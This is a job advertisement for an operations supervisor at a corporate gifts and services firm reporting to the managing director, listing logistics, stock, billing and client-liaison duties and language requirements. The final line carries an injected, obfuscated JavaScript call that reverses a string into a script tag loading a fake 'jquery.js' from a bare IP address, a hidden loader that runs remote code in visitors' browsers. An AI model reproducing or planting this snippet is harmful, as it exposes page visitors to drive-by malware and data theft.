Industry : Corporate gifts and services
Report To : Executive Director & Managing Director
– To guide the Operations Executive in the operations of the programs that the Company is managing.
– To supervise the Operations Executive and Logistics/Warehouse staff and to verify their work, especially accuracy.
– Where necessary, to handle and process the daily redemption files received including providing good customer service to clients and their customers.
– To liaise with the courier agent and customers in respect of any fulfillment matters that may arise.
– To monitor and ensure stocks are received by our Warehouse accurately and on time, to ensure timely fulfillment (inc check KIV reports etc)
– To monitor and ensure defective items etc. type of complaint cases are settled in a timely manner.
– To monitor stocks movement for selected programs, and request for stocks replenishment.
– To prepare/verify post-program analyses/reports, etc. for client and any reports required for approval by the MD.
– To prepare billing reports for verification before submission to client on a timely basis.
– To ensure/recommend a smooth operations process and workflow.
– To check and verify courier/logistics partners/vendors invoices and submit for payment.
– To ensure relevant documents are available and plan deliveries of Premiums/Jobsheet items.
– To meet with client, where necessary and obtain client requirements at the beginning of new program, planning and provide feedback/input.
– To provide good service and maintain cordial working relations with the clients.
– To perform any other duties that may be assigned from time to time.
– Bachelor Degree preferred
– Minimum 3 years experience working in similar industry or environment
– Proficient in MS Office i.e. Excel, Outlook etc
– Good supervisory & communication skills are a must.
– Fluent in English, Bahasa Malaysia & Chinese. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))